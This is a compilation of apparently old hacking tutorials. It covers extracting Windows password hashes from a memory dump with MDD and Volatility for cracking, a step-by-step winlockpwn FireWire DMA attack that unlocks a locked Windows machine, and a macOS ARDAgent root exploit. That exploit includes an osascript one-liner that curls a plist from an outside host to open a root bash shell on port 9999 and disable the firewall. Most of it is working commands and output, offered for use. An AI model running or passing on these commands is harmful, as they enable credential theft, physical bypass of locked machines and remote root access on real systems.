Tools Needed :

MDD

pyCrypto

Volatility 1.3 Beta

Volatility Plugin from Moyix

ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.

After downloading MDD from the Mantech site you need to run the program at the command line.

MDD Command Line Usage:

mdd -o OUTPUTFILENAME

Step by Step Example :

First of all, run MDD to dump the memory of the machine. The output file , would be an image of the physical memory, and MDD is often used to only dump the memory.

C:\Documents and Settings\Administrator\Desktop\MDD>mdd_1.3.exe -o dump.dd

-> mdd

-> ManTech Physical Memory Dump Utility

Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w’

This is free software, and you are welcome to redistribute it

under certain conditions; use option `-c’ for details.

-> Dumping 511.48 MB of physical memory to file ‘dump.dd’.

130938 map operations succeeded (1.00)

0 map operations failed

took 32 seconds to write

MD5 is: 78924418adaf67d22a6687dcc6ff4e23

C:\Documents and Settings\Administrator\Desktop\MDD>

Next, we will need to analyze the “memory image” – dump.dd .

For this, we will be using Using Volatility (1.3_Beta), Volatility Plugin from Moyix, and a Windows Hash/Password Finder (SamInside) to identify the passwords.

1. First of all, most of these scripts are written in python, and as such, you would need to download and install a python interpreter (Active Python ).

2. Download Volatility (1.3_Beta) , extract it to a folder.

3. Download Volatility Plugin from Moyix, extract it, and copy its content into the Volatility folder, overwriting your existing forensics, memory_objects, and memory_plugins folders.

4. Download pyCrypto and install it.

5. Copy the dump.dd file (output file of MDD) into the Volatility folder.

6. Run hivescan from volatility to get the hive offsets. Execute the following:

C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta> python volatility hivescan -f dump.dd

Offset (hex)

45147992 0×2b0e758

45393752 0×2b4a758

49832984 0×2f86418

56797016 0×362a758

58091352 0×3766758

64191328 0×3d37b60

145440776 0×8ab4008

146819936 0×8c04b60

147082080 0×8c44b60

197245792 0xbc1bb60

215368912 0xcd644d0

228964464 0xda5b870

244838408 0xe97f008

271077384 0×10285008

271171592 0×1029c008

361696096 0×158f0b60

373147760 0×163dc870

401433808 0×17ed64d0

425734152 0×19603008

435642376 0×19f76008

452021088 0×1af14b60

489651040 0×1d2f7b60

506391392 0×1e2eeb60

509397104 0×1e5cc870

526976208 0×1f6904d0

C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>

7. Next, Run hivelist from volatility with the first hivescan offset, from previous output. Execute the following:

C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>python volatility hivelist -f dump.dd -o 0×2b0e758

Address Name

0xe1cda008 \Documents and Settings\Administrator\Local Settings\Application Da

ta\Microsoft\Windows\UsrClass.dat

0xe1cc4008 \Documents and Settings\Administrator\NTUSER.DAT

0xe1afeb60 \Documents and Settings\LocalService\Local Settings\Application Dat

a\Microsoft\Windows\UsrClass.dat

0xe1b4c008 \Documents and Settings\LocalService\NTUSER.DAT

0xe1b13870 \Documents and Settings\NetworkService\Local Settings\Application D

ata\Microsoft\Windows\UsrClass.dat

0xe1b004d0 \Documents and Settings\NetworkService\NTUSER.DAT

0xe1609b60 \WINDOWS\system32\config\software

0xe160bb60 \WINDOWS\system32\config\default

0xe1741b60 \WINDOWS\system32\config\SAM

0xe1607008 \WINDOWS\system32\config\SECURITY

0xe142e418 [no name]

0xe1036758 \WINDOWS\system32\config\system

0xe1022758 [no name]

C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>

8. Now that we have the address locations, Pay attention to SAM & SYSTEM addresses. Find Password Hash using this command : python volatility hashdump -f dump.dd -y System Hive Offset -s SAM Hive Offset.

python volatility hashdump -f dump.dd -y 0xe1036758 -s 0xe1741b60

Extracted SAM :

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

HelpAssistant:1000:e342f6782d705142f81cce8f13488846:5cc6a7ed5dce2e04e648b8b6c14c9eed:::

SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:00fb5891d8488d816968e68a09a868b8:::

john:1003:972d6bbe1f00e65eaad3b435b51404ee:69bf94898385467264708f3cc51cf0a4:::

Now you can just open this as a pwdump file in SamInside and crack it !

Source: Warlock

winlockpwn is a memory analysis tool released by Adam Boileau of storm.net.nz. This utility exploits firewire’s direct memory access. The operating system allows firewire devices to directly read/write memory without having to go through the processor. Sounds handy right?

I installed winlockpwn on Ubuntu 7.10 and a fully patched Windows XP SP2 box. The first step is to download the required libraries:

sudo aptitude install libdc1394-13 libraw1394-dev swig python

Now we need to download and install Python 2.3 because I tried to run it using Python 2.5 with no success:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar -zxvf Python-2.3.6.tgz
cd Python-2.3.6
./configure
make
sudo make install

The next step is to modify libraw1394:

sudo vim /usr/include/libraw1394/raw1394.h

At this point go ahead and search for “__attribute__((deprecated));” in the file raw1394.h and comment out every line that contains it. Hint: don’t forget to end the line above it with a semi-colon. Once you comment all of them out, save and close the file. The next step is to get the pythonraw1394 library. It contains the python bindings for libraw1394, romtool, and businfo from Adam’s site.

wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz

And of course, we need to untar it

tar -zxvf pythonraw1394-1.0.tar.gz

Now we need to go into the untared directory and download the actual winlockpwn script:

cd pythonraw1394
wget http://www.storm.net.nz/static/files/winlockpwn

The winlockpwn script needs to be in the pythonraw1394 directory or it wont work without modifying the code. Also, we need to make it executable:

chmod +x winlockpwn

Now we also need to edit the Makefile for pythonraw1394 to point it to python 2.3’s include directory:

sudo vim Makefile

Now change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6. Again, save and quit and compile it with the following command:

sudo make

The raw1394 module also needs to also be loaded and the permissions changed on the raw1394 devices:

sudo modprobe raw1394
sudo chmod 666 /dev/raw1394

Now we need to plug into the windows machine and then edit the romtool to reflect the location of python:

sudo vim romtool

Change #!/usr/bin/python to #!/usr/local/bin/python on the first line one of the file.
Repeat the same step for the winlockpwn script as well.
And then load the ipod image onto the firewire port.

./romtool -s 0 ipod.csr

Loading the ipod image onto the firewire port basically fools windows into thinking your linux box is an ipod.
Now we can run businfo to make sure the ipod image is loaded and on what port number it is on as well as making sure you can see your computer on the other end. Mine showed the ipod image loaded onto port number 0 and my windows box on node number 1.
Now, the fun part! Run winlockpwn
as follows:

winlockpwn port node target

Mine looked like this:

./winlockpwn 0 1 1

Once you run winlockpwn, the windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.

There are many security issues that arise from winlockpwn. What is to stop one of the janitorial staff from getting into the CEO’s office after hours and immediately getting access to his box because all he did was lock it before he went home? It just goes to show that once someone gains physical access, game over.

I don’t have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “touch /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “rm /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
So, how dangerous is this? Here’s an example:

osascript -e ‘tell app “ARDAgent” to do shell script “cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl “‘

This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can ‘nc localhost 9999′ and find yourself at a root shell.

To remove, run ‘launchctl unload com.apple.bash’ ‘launchctl unload /System/Library/LaunchDaemons/bash.plist’ and then ‘rm /System/Library/LaunchDaemons/bash.plist’

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.